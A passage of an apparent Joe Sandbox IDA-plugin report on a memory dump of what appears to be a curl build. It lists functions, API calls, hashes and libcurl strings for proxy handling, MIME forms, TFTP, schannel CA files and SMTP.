sha256//, xrefs: 000E7901, 000E7A51

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$fseekmalloc$fclosefopenfreadftellstrncmp
String ID: public key hash: sha256//%s$;sha256//$sha256//
API String ID: 477934247-1625489732
Opcode ID: 7f0f30d17d2d5dff60f5e35c8da7075ebeb9b0bb3f1a379eaa5a4253a381154f
Instruction ID: 287959459283395f0ca1370b4f11ce26eb721ced58c164ff91a695c5b0e3fa5b
Opcode Fuzzy Hash: 7f0f30d17d2d5dff60f5e35c8da7075ebeb9b0bb3f1a379eaa5a4253a381154f
Instruction Fuzzy Hash: F2911231A04659EFCF259F66EC04AAEBBB6EF80350F14407AE909B3251EB705E418B91

Function 000E16CA Relevance: 32.8, APIs: 26, Instructions: 280COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E1740
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,000C8BF9), ref: 000E1765
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000C8BF9), ref: 000E1782
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C8BF9), ref: 000E17A6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E17CB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E17F5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E181D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1876
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1893
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E18B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E18EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E190C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1929
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1946
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1963
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1980
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E199D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19D7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E19F4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A11
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A2E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A4B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1A68
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1AE2

Part of subcall function 000DD126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DD13A

Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E1AB8

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7e56519a1bbaad944ce8901f43cc72d35c3b9c189116121c7db18167c67ce3f4
Instruction ID: 42364cab38bf89de2532671d552a6657ea1e75966125a1fc170d6b521d22621d
Opcode Fuzzy Hash: 7e56519a1bbaad944ce8901f43cc72d35c3b9c189116121c7db18167c67ce3f4
Instruction Fuzzy Hash: 11B1F931714916EBDB0D5F34EC545A8FBA2FF88310F14812FE46A93662CF7438619BA6

Function 000E3C44 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 335COMMON

Download Yara Rule

APIs

Part of subcall function 000D5D67: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,000CA827,?,?,00000000), ref: 000D5D7A

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4013
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4025
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E4039

Strings

Unsupported proxy syntax in '%s', xrefs: 000E3FE8
socks5, xrefs: 000E3CE7
socks, xrefs: 000E3D1F
http, xrefs: 000E3D2F
socks4a, xrefs: 000E3CFB
socks4, xrefs: 000E3D0F
Unsupported proxy scheme for '%s', xrefs: 000E3D41
socks5h, xrefs: 000E3CD3
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support., xrefs: 000E3D74
https, xrefs: 000E3CBA

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$calloc
String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
API String ID: 3095843317-874090715
Opcode ID: ef99635be4ef8a6e6afcf9914b6aff1bc1becd6a9b8f515849055a7f36990c87
Instruction ID: 012e2e8fd5b3209e32e89481b42b07b61cccf10ddb565f8903004569ff17f85f
Opcode Fuzzy Hash: ef99635be4ef8a6e6afcf9914b6aff1bc1becd6a9b8f515849055a7f36990c87
Instruction Fuzzy Hash: 99C1C231E04259DFDB249B56D849BEEBBF6EF84310F14803AE805BB391DB709E418B61

Function 00103BB5 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 134COMMON

Download Yara Rule

APIs

_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103BC3
_mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,CurrentUser,00000000), ref: 00103BE1
_mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,LocalMachine,00000000), ref: 00103C00
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,0000005C), ref: 00103CC8

Strings

LocalMachine, xrefs: 00103BFA
CurrentUser, xrefs: 00103BDB
CurrentUserGroupPolicy, xrefs: 00103C70
LocalMachineGroupPolicy, xrefs: 00103C8C
LocalMachineEnterprise, xrefs: 00103CA8
CurrentService, xrefs: 00103C19
Users, xrefs: 00103C54
Services, xrefs: 00103C38

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _mbschr_mbsnbcmp
String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
API String ID: 866314863-3209074899
Opcode ID: 6e07131fd48c060ad249a6da534e79688381422982507b2dab860b07171d2d9d
Instruction ID: 8a9effaad06b9d108007cb4d649540d504e13f64662b1c60fbce65e7378676e8
Opcode Fuzzy Hash: 6e07131fd48c060ad249a6da534e79688381422982507b2dab860b07171d2d9d
Instruction Fuzzy Hash: 7941F631204306EFE7145F65FE85B7B3BADEF80748F24801AE891E3282E7B08A549651

Function 000CEEAB Relevance: 30.3, APIs: 6, Strings: 14, Instructions: 263COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF06B
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF0B1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF0F7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF13D

Part of subcall function 000CEEAB: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,000CF2DD,?,?,?,000CF296), ref: 000CF1C0

Part of subcall function 000CE9EB: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 000CEA46

Strings

curl_mime_name(part%d, "%s");, xrefs: 000CF11A
mime%d = NULL;, xrefs: 000CF048
curl_mime_filename(part%d, NULL);, xrefs: 000CEFBE
part%d = curl_mime_addpart(mime%d);, xrefs: 000CEEE9
curl_mime_encoder(part%d, "%s");, xrefs: 000CF08E
curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 000CEFF3
curl_mime_filedata(part%d, "%s");, xrefs: 000CEF8D
curl_mime_subparts(part%d, mime%d);, xrefs: 000CF029
(curl_seek_callback) fseek, NULL, stdin);, xrefs: 000CEF61
curl_mime_headers(part%d, slist%d, 1);, xrefs: 000CF198
slist%d = NULL;, xrefs: 000CF1AF
curl_mime_type(part%d, "%s");, xrefs: 000CF160
curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 000CEF45
curl_mime_filename(part%d, "%s");, xrefs: 000CF0D4

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$malloc
String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
API String ID: 2190258309-2644548734
Opcode ID: 4ab10a1860deacd57d3b6c4b6a977d5ea7fad4269afbdbdd8bcc3f302bc7f058
Instruction ID: e052745a7109c19f7c6d422004200223af45d999833806e8c77a5832417b2aa9
Opcode Fuzzy Hash: 4ab10a1860deacd57d3b6c4b6a977d5ea7fad4269afbdbdd8bcc3f302bc7f058
Instruction Fuzzy Hash: BD81A633544261EBCB756B94DC46FAE36A2DB41730F28837CFD24672D2EB718E528641

Function 000D649E Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 462COMMON

Download Yara Rule

Strings

%%%02x, xrefs: 000D66D1
, xrefs: 000D659D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID:
String ID: $%%%02x
API String ID: 0-2848173732
Opcode ID: b8e48d3dae992d712087caebb86d9371e8e34eb72fefd4733fb86cd814bbc98d
Instruction ID: 819d1c402c9f8fbe3924f2a12cefbca2532ceb158cd59e65dd214ff750a9c526
Opcode Fuzzy Hash: b8e48d3dae992d712087caebb86d9371e8e34eb72fefd4733fb86cd814bbc98d
Instruction Fuzzy Hash: 86F10430A08749DBDF288F64E8507BDBBF6AF45310F14806BD882A7352DB369D458B71

Function 000D0637 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 210COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000078,00000000,?,?,?,?,000CD002), ref: 000D0658
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000025,00000000,?,?,?,000CD002), ref: 000D0699

Strings

%header{, xrefs: 000D07F8
curl: unknown --write-out variable: '%s', xrefs: 000D070A
header{, xrefs: 000D07CC

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfputc
String ID: %header{$curl: unknown --write-out variable: '%s'$header{
API String ID: 2340846889-221383536
Opcode ID: 95978e76fcce3af557b4e5c64bb778b764d727a20aeaa48b8c9c1c810a84e5a4
Instruction ID: f9023370a1666237da6001ab6477b65d5b34ac096b4a3164238ae8b29f1b0fde
Opcode Fuzzy Hash: 95978e76fcce3af557b4e5c64bb778b764d727a20aeaa48b8c9c1c810a84e5a4
Instruction Fuzzy Hash: 1F514931D08344EBEB244B649C0DBEE7BF5EF81754F24805BE49D9F381EAA29840D6B5

Function 000F76AF Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 176stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000F7789
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000F77FC

Strings

server requested blksize larger than allocated, xrefs: 000F784A
Malformed ACK packet, rejecting, xrefs: 000F788D
%s (%d), xrefs: 000F7865
tsize parsed from OACK, xrefs: 000F7809
blksize parsed from OACK, xrefs: 000F77C8
%s (%ld), xrefs: 000F780E, 000F784F
requested, xrefs: 000F77C2
blksize is larger than max supported, xrefs: 000F7860
%s (%d) %s (%d), xrefs: 000F77CD
invalid tsize -:%s:- value in OACK packet, xrefs: 000F787D
got option=(%s) value=(%s), xrefs: 000F7763
invalid blocksize value in OACK packet, xrefs: 000F7875
tsize, xrefs: 000F77E6
blksize is smaller than min supported, xrefs: 000F7858
blksize, xrefs: 000F7771

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strtol
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Malformed ACK packet, rejecting$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 76114499-360479797
Opcode ID: af785fb5ae94ca5b91303a989bc1b3e2460571ed59fe84906da8068af29f85b0
Instruction ID: 7041e3ad6deaa9547688aa578af16ffbf72a5257eb07c0faa6af7c96d77290dc
Opcode Fuzzy Hash: af785fb5ae94ca5b91303a989bc1b3e2460571ed59fe84906da8068af29f85b0
Instruction Fuzzy Hash: FA516E71F88309ABD7149A649C46EBF37B5AF80740F14407AE50AB72C1EB709D02D7A2

Function 0010EE09 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 170fileCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,000001B8,?), ref: 0010EE3F
GetFileSizeEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 0010EEC6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010EED1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EF3A
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,00000000), ref: 0010EF76
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0010EFC1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F006
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,000001B8,?), ref: 0010EE50

Part of subcall function 000DA1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1AB
Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1B3
Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1E9
Part of subcall function 000DA1A0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1F6
Part of subcall function 000DA1A0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1FE
Part of subcall function 000DA1A0: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA209

CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,000001B8,?), ref: 0010EE8F
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010EEA1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EFDB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0010EFE9

Strings

schannel: failed to determine size of CA file '%s': %s, xrefs: 0010EEE7
schannel: failed to open CA file '%s': %s, xrefs: 0010EEB7
schannel: CA file exceeds max size of %u bytes, xrefs: 0010EF18
schannel: invalid path name for CA file '%s': %s, xrefs: 0010EE66
schannel: failed to read from CA file '%s': %s, xrefs: 0010F021

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast$File_errno$free$CloseCreateHandleReadSize_strdupmalloc
String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
API String ID: 1064901726-3430970913
Opcode ID: 483355f62eaf2702a962c5dfbe7bea8744517944f1f921d6afbffc9d19731c9f
Instruction ID: c34c8dd013370a82eaea9f10ffeb42ea3d59b9975e62f3d1833a631f8d79b7f2
Opcode Fuzzy Hash: 483355f62eaf2702a962c5dfbe7bea8744517944f1f921d6afbffc9d19731c9f
Instruction Fuzzy Hash: 4051F871A00219EBDF295B21DC06BEE77B9EB48310F10489AF549E72C1DBB09D818FA4

Function 000F6179 Relevance: 28.9, APIs: 10, Strings: 9, Instructions: 363COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F623D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F62C2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F634C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6382
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F6484
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F649E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F64B2

Strings

SIZE=, xrefs: 000F6512, 000F651C
AUTH=, xrefs: 000F6523, 000F652E
<%s>, xrefs: 000F621D, 000F632E
%I64d, xrefs: 000F6462
Mime-Version, xrefs: 000F63CD
Mime-Version: 1.0, xrefs: 000F63E4
SMTPUTF8, xrefs: 000F6501, 000F650B
<%s@%s>, xrefs: 000F6207, 000F631E
MAIL FROM:%s%s%s%s%s%s, xrefs: 000F6533

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: AUTH=$ SIZE=$ SMTPUTF8$%I64d$<%s>$<%s@%s>$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0
API String ID: 1294909896-2994854565
Opcode ID: 25b23dec81098f3d0b8b61e1468b44181ee81ed2a2aa246d14736bca99bfa35f
Instruction ID: a33c3940c4a1f769d6d92e3bcb82dafd9f3b7485adb9814600fbf34e7ed039de
Opcode Fuzzy Hash: 25b23dec81098f3d0b8b61e1468b44181ee81ed2a2aa246d14736bca99bfa35f
Instruction Fuzzy Hash: 7DC12631B0462EEBDB14DB64DC509FEBBF5FF45310F28806AE901A7641DB72AD409BA1

Function 000D3FAE Relevance: 28.8, APIs: 2, Strings: 17, Instructions: 321COMMON

Download Yara Rule

APIs

Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D41F8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D420C

Strings

Content-Disposition, xrefs: 000D40D4
text/plain, xrefs: 000D40A2
form-data, xrefs: 000D42EC, 000D42FF
Content-Type: %s%s%s, xrefs: 000D423B
; name=", xrefs: 000D41C9, 000D41D1
Content-Transfer-Encoding: %s, xrefs: 000D42A1
Content-Type, xrefs: 000D3FFF
multipart/mixed, xrefs: 000D4041
8bit, xrefs: 000D4298, 000D429D
Content-Transfer-Encoding, xrefs: 000D425F
application/octet-stream, xrefs: 000D4073
Content-Disposition: %s%s%s%s%s%s%s, xrefs: 000D41D8
; boundary=, xrefs: 000D422E, 000D4236
attachment, xrefs: 000D4121, 000D4129
; filename=", xrefs: 000D41B4, 000D41BE
multipart/, xrefs: 000D410C
multipart/form-data, xrefs: 000D42DD

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
API String ID: 1294909896-1595554923
Opcode ID: e4ae1a668a361e9766910dee178f7cc2c1ab85d729697f7d36ce62c5891a2127
Instruction ID: b70f37c46623c7825b9e4562c0df3a62f97a340f6196f6de59959f0886a2bd76
Opcode Fuzzy Hash: e4ae1a668a361e9766910dee178f7cc2c1ab85d729697f7d36ce62c5891a2127
Instruction Fuzzy Hash: F7B19D30B00716ABDB68CE69D5907AAB7E5BF58310F54813BE905E7B81D770ED90CBA0

Function 000EAAC7 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 339COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000EAB92
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EAC3A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EAC4F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EACD1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000EACE6

Strings

read function returned funny value, xrefs: 000EADA9
*, xrefs: 000EACA5
Moving trailers state machine from initialized to sending., xrefs: 000EAB00
%zx%s, xrefs: 000EAE06
Successfully compiled trailers., xrefs: 000EAC11
Signaling end of chunked upload after trailers., xrefs: 000EAF0B
Malformatted trailing header, skipping trailer, xrefs: 000EABDD
Signaling end of chunked upload via terminating chunk., xrefs: 000EAE65
operation aborted by trailing headers callback, xrefs: 000EAC95
operation aborted by callback, xrefs: 000EAD40
Read callback asked for PAUSE when not supported, xrefs: 000EAD69

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$___from_strstr_to_strchr
String ID: %zx%s$*$Malformatted trailing header, skipping trailer$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
API String ID: 622630536-1407958152
Opcode ID: 44b081910ddc3248f2beeb296fcd31326227f8e8617bfd6bd2653ac47527eeb6
Instruction ID: 62d4cef82cd245a3cbb7e423d8974deba76a3dce22b3dadd2db1484e8736d826
Opcode Fuzzy Hash: 44b081910ddc3248f2beeb296fcd31326227f8e8617bfd6bd2653ac47527eeb6
Instruction Fuzzy Hash: 05D1C131A043459FDF15DF24D895BED7BE2EF89310F28417AD809AB386DB74A841CBA1

Function 000FE107 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 291COMMON

Download Yara Rule

APIs

